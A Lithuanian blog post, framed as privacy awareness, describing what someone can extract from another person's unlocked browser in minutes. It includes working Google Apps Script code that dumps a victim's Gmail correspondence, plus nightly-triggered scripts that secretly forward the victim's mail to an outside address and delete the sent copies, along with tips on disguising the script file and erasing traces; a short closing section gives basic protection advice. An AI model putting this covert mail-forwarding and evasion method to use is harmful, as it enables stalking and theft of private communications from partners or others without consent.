Ką galima sužinoti apie jus trumpam gavus prieigą prie naršyklės jūsų kompiuteryje

Saugumas, privatumas

Šį kartą apie tai, ką galima apie kompiuterio naudotoją sužinoti vos per kelias minutes, gavus prieigą prie jo naršyklės.

Jei nutarsite šią informaciją panaudoti ne savo kompiuteryje, surinkti ar sužinoti svetimus asmeninius duomenis – prieš tai darydami pasidomėkite ką už tokią veiklą žada „Baudžiamasis kodeksas“, jau nekalbant apie moralinę šio reikalo pusę.

Šio straipsnio paskirtis yra kompiuterio naudotojo supažindinimas su kai kuriomis silpnomis naršyklių ar tarnybų vietomis ir tuo, kaip svarbu yra apsaugoti kompiuterio sistemą slaptažodžiu ir nepalikti jos atrakintos be priežiūros, net trumpam, nes gali pakakti vos kelių minučių, kad slaptažodžiu neapsaugota sistema, „smalsuoliui“ apie jus papasakotų ilgą ir išsamią istoriją.

Kokią informaciją apie „Mac“ kompiuterio naudotoją galima gauti rašiau jau anksčiau, jame yra šiek tiek ir su „Safari“ naršykle susijusios informacijos. Žemiau pakalbėsiu apie tai, kokią informaciją apie kompiuterio, nebūtinai „Mac“, naudotoją galima gauti turint prieigą prie vieno tipo aplikacijos - interneto naršyklės.

Skambučių išklotinė

Kai kurių mobilaus ryšio operatorių savitarnos svetainės leidžia naršyklei išsaugoti prisijungimo prie jų duomenis. Dėl tos priežasties, norint gauti detalų skambučių sąrašą, neretai už kelis ar net keletą mėnesių, tereikia žinoti kokio operatoriaus paslaugomis naudojasi kompiuterio savininkas ir, žinoma, to operatoriaus savitarnos svetainės adresą. Toliau viskas paprasta - naudojantis svetainės meniu tereikia nueiti į statistiką ir tų duomenų užklausi.

Taip, keliais mygtukų paspaudimais, galima sužinoti kokiais telefono numeriais „abonentas“ naudojasi, kuriais skambina dažniausiai ir kiek laiko prašneka.

Interneto paieškų istorija

Google“ paieška vis dar išlieka pati populiariausia ir daugelis vartotojų ją savo naršyklėse yra nurodę, kaip numatytąją. Jei „Google“ paiešką naudojate ir Jūs, prie Jūsų kompiuterio gavęs prieigą „pilietis“, naršyklėje įvedęs history.google.com/history/, greičiausiai, sužinos kokios informacijos ieškote internete. O norintis patyrinėti duomenis detaliau, ramioje aplinkoje, smalsutis gali iš puslapio meniu pasirinkti „ Download searches“ ir paspaudęs „OK“ sulaukti kol sugeneruotas paieškų archyvas bus atsiųstas į elektroninio pašto dėžutę bei tą archyvą pasiimti, o laišką ištrinti.

Paspaudus ant dešinėje pusėje esančios paskyros piktogramos, jei naudojamos kelios „Google“ paskyros, galime patikrinti ar jos yra susietos ir jei taip, tą patį atlikti su kitomis paskyromis.

Paieškos užklausos archyve yra suskirstytos mėnesiais ir išsaugotos „.json“ formate. Į „Microsoft Exel“ failų formatą jas nemokamai sukonvertuoti galima svetainėje json-xls.com.

Elektroninių laiškų išsaugojimas

Šis triukas veikia tik su „Gmail“ paskyromis, tačiau nemanau, kad tai būtų didelė problema „smalsučiui“, nes daug vartotojų jas naudoja.

Norint „smalsučiui“ į išorinę laikmeną perkelti „Gmail“ paskyroje esančius el.laiškus, jam tereikia nueiti į„Google Docs“ paskyrą adresu docs.google.com, sukurti naują failą, iš dokumento meniu pasirinkti Tools → *Script editor…*ir jame patalpinti žemiau esantį kodą:

function collectEmails() {
 var doc = DocumentApp.create("Susirašinėjimas"); // Naujas failas bus patalpintas šakniniame Google Drive aplanke
 var searchText = "koks_nors_adresas@gmail.com"; // Adresas susirašinėjimą su kuriuo norime išsaugoti
 var finalText = ""; // Kintamasis į, kurį bus renkami laiškų tekstai
 var body = doc.getBody();
 var threads = GmailApp.search(searchText); //Vykdoma visų laiškų, kuruose yra ieškomas adresas paieška
  for (var x=0; x<=threads.length-1; x++) { // Peržiūrima kiekviena aptikta laiškų grandis
    var messages = threads[x].getMessages(); // Grandis suskirstoma pagal laiškus
    for (i=0;i<=messages.length-1;i++) { // Peržiūrimas kiekvienas laiškas
      finalText=finalText + messages[i].getSubject() + messages[i].getPlainBody() + "";// Nuskaitomas laiško tekstas ir tema
    }
   body.appendParagraph(finalText); // Visų laiškų tekstai ir temos išsaugomi faile
  }
}

Įvedus tekstą reikia paspausti skripto paleidimo mygtuką, sutikti su tuo, kad failas bus išsaugotas, dar kartą paspausti skripto paleidimo mygtuką ir suteikti skriptui prieigą prie el.pašto. Jokių slaptažodžių įvesti nereikės.

Sukurtą failą galima atsisiųsti į išorinę laikmeną ir vėliau patyrinėti jo turinį. Apdairus „smalsuolis“, kuris nenori jog jo veikla būtų aptikta – panaikins visus savo veiklos pėdsakus.

Metodą search() galima išnaudoti ne tik susirašinėjimo su konkrečiu žmogumi paieškai, bet ir paieškai pagal kitus kriterijus. Pavyzdžiui:

  • from:Vardenis Pavardenis – bus ieškoma visų laiškų, kurie atsiųsti nurodyto asmens
  • subject:tik niekam nesakyk – bus ieškoma laiškų su nurodyta tema
  • has:attachment – bus ieškoma laiškų, prie kurių yra prisegti failai
  • is:unread – bus ieškoma neskaitytų laiškų
  • is:spamed – bus ieškoma laiškų, kurie pripažinti kaip brukalai
  • after:2016/01/05 – bus ieškoma laiškų, kurie išsiųsti po nurodytos datos
  • before:2016/01/05 – bus ieškoma laiškų, kurie išsiųsti iki nurodytos datos
  • *circle:Šeima*: – bus ieškoma laiškų, gautų iš nurodytos grupės narių
  • size:1000000 – bus ieškoma laiškų, kurių dydis daugiau nei 1 megabaitas

Norint nurodyti daugiau nei vieną paieškos kriterijų – juos reikia atskirti tarpais.

Apie tai, kaip gauti prieigą prie elektroninio pašto paskyrų, kurioms naudojama „Mail“ aplikacija „Mac“ kompiuteriuose skaitykite anksčiau skelbtame straipsnyje apie tai kokią informaciją galima gauti turint prieigą prie „Mac“ kompiuterio.

Gmail kontaktų eksportas

Norint išeksportuoti Google paskyroje esančius kontaktus, naršyklėje reikia atidaryti contacts.google.com, pasirenkame punktą „Export“, nurodome eksporto parametrus ir atsidariusiame lange spaudžiame „Export“. Kompiuterio atsisiuntimų aplanke, pavyzdžiui „Downloads“ turėtumėte pamatyti nurodyto formato failą, pvz.: „google.csv“, kurį galima peržiūrėti „Numbers“, „Google Docs“, „Microsoft Excel“ ir kitose „.csv“ formatą palaikančiose aplikacijose.

„Aukos“ planų sekimas

Apsilankius calendar.google.com, paspaudus ant krumpliaračio piktogramos ir pasirinkus SettingsCalendars bei radus dominantį kalendorių galima atidaryti prie jo prieigą visiems - paspaudus ant bendrinimo nuorodos ir varnele pažymėjus „Make this calendar public“. Atsidariusiame puslapyje reikės nurodyti „Google“ paskyrą iš kurios norite stebėti kalendorių.

Kalendoriaus savininkas apie tai, kad įrašai jo kalendoriuje matomi ne tik jam aptikti gali tik tada kai tuo kalendoriumi nutars su kuo nors pasidalinti. Jei „smalsutis“ gudrus, vargu ar net sužinoję jo „Gmail“ paskyrą, kuri seka Jūsų kalendorių, ką nors pešite.

Svetimo pašto skaitymas kasdien

Jei žinant slaptažodį jungtis prie „aukos“ „Gmail“ paskyros iš kito kompiuterio tai savaitę laiko „auka“, naudojanti naršyklę lango viršuje matys informaciją apie tai, kad prie jo pašto buvo prieita iš kito kompiuterio ar IP adreso. Tas pats nutiks ir jei „aukos“ laiškus peradresuoti „tradiciniu būdu“. Tai daroma norint išvengti „smalsučių“ svetimo susirašinėjimo sekimo. Tačiau, jei laiškų peradresavimą organizuoti „Google Apps Script“ pagalba - jokių pranešimų nebus ir „auka“ apie tai gali sužinoti tik patikrinusi savo el.pašto paskyros GAS trigerių sąrašą.

Kaip atliekamas laiškų peradresavimas „Google Apps Script“ pagalba.

Atidarius „aukos“ docs.google.com paskyrą sukuriamas naujas failas ir iš dokumento meniu pasirinkus ToolsScript editor… jame patalpinamas žemiau esantis kodas:

function fwdEmails() {
  var searchText = "newer_than:1d"; 
  var threads = GmailApp.search(searchText); // Ieškomi laiškai išsiųsti vienos paros bėgyje
    for (var x=0; x<=threads.length-1; x++) { // Peržiūrimos visos laiškų sekos
      var messages = threads[x].getMessages(); // Sekos suskirstomos į laiškus
      for (i=0;i<=messages.length-1;i++) { // Peržiūrimas kiekvienas laiškas
          messages[i].forward("kur_persiusti_laiska@gmail.com"); // Nurodomas el.pašto adresas į kurį persiųsti laiškus
                 }  
    }
}

Aukščiau esantis skriptas persiunčia visus vienos paros bėgyje išsiųstus laiškus. Į skriptą, esant poreikiui galima įvesti ir kitus pašto atrinkimo kriterijus (žr. „Elektroninių laiškų išsaugojimas“ skirsnį esantį aukščiau).

Dabar reikia sukurti kodą, kuris šalins persiųstus laiškus iš aplanko „Sent Mail“.

Žemiau patalpiname kodą, kuriame nurodomas toks pats gavėjo el.pašto adresas, kokiu aukščiau esančiam skriptui nurodyta persiųsti „aukos“ laiškus.

function deleteEmails() {
  var searchText = "to:kur_persiusti_laiska@gmail.com"; 
  var threads = GmailApp.search(searchText); // Ieškomi laiškai išsiųsti nurodytu adresu
    for (var x=0; x<=threads.length-1; x++) { // Peržiūrima kiekviena aptikto laiško seka
      var messages = threads[x].getMessages(); // Kiekviena aptikta seka suskirstoma į laiškus
      for (i=0;i<=messages.length-1;i++) { // Peržiūrimas kiekvienas laiškas
          messages[i]..moveToTrash(); // Paieškos kriterijus atitinkantys laiškai perkeliami į ištrintų laiškų sąrašą
       }  
    }
}

Išsaugojus failą belieka padaryti taip, kad abu šie skriptai automatiškai pasileistų kasnakt.

Skriptų redaktoriuje: ResourcesCurrent project’s triggers, suteikiamas projektui vardas (jei to dar nepadaryta) ir paspaudus ant “No triggers set up. Click here to add one now.“ nurodoma kada kokią skripto funkciją vykdyti ir išsaugomi pakeitimai.

Nurodymas kada vykdyti „Google Apps Script“

Aukščiau pateikti skriptų pavyzdžiai nėra tobuli (specialiai nelengvinau „piktiems smalsučiams“ gyvenimo) ir „auka“ gali ištrintus laiškus aptikti ištrintų laiškų aplanke. Jei „auka“ aktyviai naudoja “Google Docs“ - ji gali aptikti skriptų failus, tačiau ne itin patyrusioms aukoms apgauti – galima komentarų pavidalu parašyti ilgą informaciją, kad ir apie „Google Docs“ klavišų kombinacijas, failą pavadinti kaip nors „Autogenerated Help Document“ bei failo viršuje parašyti prašymą failo netrinti ir blah… blah… blah… Žodžiu, norint apgauti – tai padaryti nėra sunku, o ypač žmogų, kuris nesilaiko elementarių naudojimosi kompiuteriu saugumo taisyklių.

Prisijungimų prie svetainių informacija

Daugelyje populiarių naršyklių saugoma prisijungimų prie svetainių informacija. „Safari“ ją pamatyti galima iš naršyklės meniu pasirinkus SafariPreferencesPasswords. Tiesa, slaptažodžiams pamatyti reikia žinoti kompiuterio paskyros slaptažodį, tačiau turint pakankamai informacijos apie vartotoją ir žinant jo įpročius bei turinti prieigą prie elektroninio pašto ir kitų kompiuteryje esančių resursų labai galimas dalykas, kad slaptažodis nėra tokia jau neįveikiama kliūtis.

Pėdsakų naikinimas

Protingas, „smalsutis“ po tokios veiklos turi dar apsišluoti – panaikindamas naršymo istoriją ir kitus savo „purvinų batų“ paliktus pėdsakus. Kokie kur pėdsakai lieka nedetalizuosiu – protingas pats žino, o kvailam nereikia užsiimti ne savo reikalais, o ir tikslas šio straipsnio buvo ne palengvinti „smalsučių“ gyvenimą, o potencialių „aukų“ supažindinimas su paprastomis technikomis, prieinamomis visiems ir galinčiomis tapti intervencijos į jo/jos privatų gyvenimą įrankiais.

Kaip apsisaugoti

Jei skaitėte straipsnį ir net pasiekėte neuždarę jo šias eilutes – tikriausiai suprantate, kad gerai pasiruošus iš anksto, gerai žinant tikslus ir turint nesudėtingas priemones bei neatsargų kompiuterio vartotoją – tereikia kelių minučių vienatvės su slaptažodžiu neapsaugotu ar neužrakintu kompiuteriu ir „aukos“ žavus gyvenimas gali pavirsti košmaru.

Apsisaugojimo būdas paprastas ir labai elementarus kompiuterio naudotojams, nepriklausomai nuo kompiuterio tipo ar operacinės sistemos: apsaugokite savo kompiuterio naudotojo paskyras slaptažodžiais ir nepalikite nerakintos sistemos be priežiūros nei vienai minutei.

Pabaigai

Prašau, neberašykite man laiškų su „graudinančiu tekstu“ apie savo neištikimas puses, joms padovanotą pusę karalystės ir jų nedėkingumą, jūsų įtarinėjimus - aš nepadėsiu Jums gauti kitų žmonių duomenų. Visai nesvarbu kokie yra Jūsų motyvai, aš nesutrypsiu savo principų dėl Jūsų paranojos, negebėjimo bendrauti ar kitų žmonių (nesvarbu kas jie Jums yra) privatumo negerbimo.

Apie Ramūnas Blavaščiūnas

Fotografijos, geros technikos ir kavos mylėtojas

Vienas komentaras

  1. Informatyvus ir įdomus straipsnis. Pabaiga irgi gerai susiskaitė

Parašykite komentarą

Į viršų